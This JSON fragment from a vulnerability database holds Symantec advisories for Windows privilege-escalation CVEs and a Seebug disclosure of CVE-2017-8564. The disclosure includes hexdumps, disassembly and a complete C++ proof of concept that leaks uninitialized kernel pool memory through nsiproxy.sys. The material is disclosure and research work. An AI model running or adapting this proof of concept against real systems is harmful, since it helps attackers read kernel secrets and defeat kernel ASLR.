"symantec", "title": "Microsoft Windows CVE-2017-8562 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:16", "bulletinFamily": "software", "cvelist": ["CVE-2017-8561"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99426", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99426", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-8561 Local Privilege Escalation Vulnerability", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:44", "description": "We have discovered that the handler of the 0x120007 IOCTL in nsiproxy.sys (\\\\.\\Nsi device) discloses portions of uninitialized pool memory to user-mode clients, likely due to output structure alignment holes.\r\n\r\nOn our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:\r\n```\r\n--- cut ---\r\n00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 ................\r\n000000a0: 00 00 00 00 ff 00 ff ff 00 00 00 00 ff ff ff ff ................\r\n000000b0: 00 00 00 00 00 00 00 00 ........\r\n--- cut ---\r\n```\r\nWhere 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. As can be seen, a total of 13 bytes (out of 184) scattered across the structure are disclosed to the client application. The bug manifests itself through a call to the undocumented NSI!NsiGetParameter userland function, in the same fashion that it is called in WSDApi!CWSDInterfaceTable::GetInterfaceProfiles:\r\n```\r\n--- cut ---\r\n.text:6EA52AFF push eax\r\n.text:6EA52B00 push ebx\r\n.text:6EA52B01 lea eax, [ebp+var_BC]\r\n.text:6EA52B07 push eax\r\n.text:6EA52B08 push 0\r\n.text:6EA52B0A push 8\r\n.text:6EA52B0C lea eax, [ebp+InterfaceLuid]\r\n.text:6EA52B12 push eax\r\n.text:6EA52B13 push 7\r\n.text:6EA52B15 push offset _NPI_MS_IPV4_MODULEID\r\n.text:6EA52B1A push 1\r\n.text:6EA52B1C call _NsiGetParameter@36 ; NsiGetParameter(x,x,x,x,x,x,x,x,x)\r\n--- cut ---\r\n```\r\nThe issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for netio.sys. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools (0x3d or '=' in this case), and would otherwise contain leftover data that was previously stored in that memory region:\r\n```\r\n--- cut ---\r\nNumber of Adapters: 1\r\n\r\nAdapter Index[0]: 11\r\n00000000: 00 00 00 00 00 01 01 00 00 00 01 01 00[3d 3d 3d].............===\r\n00000010: 00 00 00 00 02 00 00 00 00 00 00 00 0a 00 00 00 ................\r\n00000020: 30 75 00 00 e8 03 00 00 c0 27 09 00 03 00 00 00 0u.......'......\r\n00000030: 01 00 00 00 64 19 00 00 0b 00 00 00 0b 00 00 00 ....d...........\r\n00000040: 0b 00 00 00 0b 00 00 00 01 00 00 00 01 00 00 00 ................\r\n00000050: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................\r\n00000060: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................\r\n00000070: 00 00 00 00 01 00 00 00 dc 05 00 00 40 00 00 00 ............@...\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 00 00 00 00 00 00 00 00 00[3d 3d 3d]08 07 00 00 .........===....\r\n000000a0: 01 00 00 00[3d]00[3d 3d]00 00 00 00[3d 3d 3d 3d]....=.==....====\r\n000000b0: 6b 0a 34 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? k.4.............\r\n--- cut ---\r\n```\r\nAt least one local network adapter must be installed on the tested machine to observe the bug. The PoC source code is based on the code sample from https://msdn.microsoft.com/en-us/library/windows/desktop/aa365947(v=vs.85).aspx (in order to list network interfaces) and http://www.nynaeve.net/Code/GetInterfaceMetric.cpp (in order to resolve and call NSI!NsiGetParameter).\r\n\r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n\r\n\r\n### NsippGetParameter.cpp\r\n```\r\n// Based on example code from https://msdn.microsoft.com/en-us/library/windows/desktop/aa365947(v=vs.85).aspx\r\n// and http://www.nynaeve.net/Code/GetInterfaceMetric.cpp.\r\n\r\n#include <winsock2.h>\r\n#include <ws2ipdef.h>\r\n#include <iphlpapi.h>\r\n#include <stdio.h>\r\n#include <objbase.h>\r\n\r\n#pragma comment(lib, \"iphlpapi.lib\")\r\n#pragma comment(lib, \"Ole32.lib\")\r\n\r\n#define MALLOC(x) HeapAlloc(GetProcessHeap(), 0, (x)) \r\n#define FREE(x) HeapFree(GetProcessHeap(), 0, (x))\r\n\r\n/* Note: could also use malloc() and free() */\r\n\r\n//\r\n// Suspected prototype of NsiGetParameter, via reverse engineering.\r\n//\r\n\r\ntypedef DWORD (__stdcall *NsiGetParameterProc)(\r\n DWORD Argument1,\r\n CONST UCHAR* Argument2,\r\n DWORD Argument3,\r\n PNET_LUID Argument4,\r\n DWORD Argument5,\r\n DWORD Argument6,\r\n PUCHAR Argument7,\r\n DWORD Argument8,\r\n DWORD Argument9\r\n );\r\n\r\n/*\r\n0:000> db NPI_MS_IPV4_MODULEID l14\r\n751b3364 18 00 00 00 01 00 00 00-00 4a 00 eb 1a 9b d4 11\r\n751b3374 91 23 00 50 04 77 59 BC\r\n*/\r\n\r\nconst unsigned char NPI_MS_IPV4_MODULEID[0x18] =\r\n{\r\n 0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x4A, 0x00, 0xEB, 0x1A, 0x9B, 0xD4, 0x11,\r\n 0x91, 0x23, 0x00, 0x50, 0x04, 0x77, 0x59, 0xBC\r\n};\r\n\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n\r\n printf(\"\\n\");\r\n }\r\n}\r\n\r\nint main() {\r\n HMODULE hNsi = LoadLibraryW(L\"Nsi.dll\");\r\n NsiGetParameterProc _NsiGetParameter = (NsiGetParameterProc)GetProcAddress(hNsi, \"NsiGetParameter\");\r\n\r\n // Declare and initialize variables\r\n PIP_INTERFACE_INFO pInfo = NULL;\r\n ULONG ulOutBufLen = 0;\r\n\r\n DWORD dwRetVal = 0;\r\n int iReturn = 1;\r\n\r\n int i;\r\n\r\n // Make an initial call to GetInterfaceInfo to get\r\n // the necessary size in the ulOutBufLen variable\r\n dwRetVal = GetInterfaceInfo(NULL, &ulOutBufLen);\r\n if (dwRetVal == ERROR_INSUFFICIENT_BUFFER) {\r\n pInfo = (IP_INTERFACE_INFO *)MALLOC(ulOutBufLen);\r\n if (pInfo == NULL) {\r\n printf\r\n (\"Unable to allocate memory needed to call GetInterfaceInfo\\n\");\r\n return 1;\r\n }\r\n }\r\n // Make a second call to GetInterfaceInfo to get\r\n // the actual data we need\r\n dwRetVal = GetInterfaceInfo(pInfo, &ulOutBufLen);\r\n if (dwRetVal == NO_ERROR) {\r\n printf(\"Number of Adapters: %ld\\n\\n\", pInfo->NumAdapters);\r\n for (i = 0; i < pInfo->NumAdapters; i++) {\r\n printf(\"Adapter Index[%d]: %ld\\n\", i,\r\n pInfo->Adapter[i].Index);\r\n\r\n NET_LUID Luid;\r\n NETIO_STATUS st = ConvertInterfaceIndexToLuid(pInfo->Adapter[i].Index, &Luid);\r\n if (st == NO_ERROR) {\r\n BYTE OutputBuffer[0xB8] = { /* zero padding */ };\r\n DWORD nsi_st = _NsiGetParameter(1, NPI_MS_IPV4_MODULEID, 7, &Luid, sizeof(Luid), 0, OutputBuffer, sizeof(OutputBuffer), 0);\r\n if (nsi_st == NO_ERROR) {\r\n PrintHex(OutputBuffer, sizeof(OutputBuffer));\r\n }\r\n }\r\n }\r\n iReturn = 0;\r\n }\r\n else if (dwRetVal == ERROR_NO_DATA) {\r\n printf\r\n (\"There are no network adapters with IPv4 enabled on the local system\\n\");\r\n iReturn = 0;\r\n }\r\n else {\r\n printf(\"GetInterfaceInfo failed with error: %d\\n\", dwRetVal);\r\n iReturn = 1;\r\n }\r\n\r\n FREE(pInfo);\r\n return (iReturn);\r\n}\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-8564)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8564"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96315", "id": "SSV:96315", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
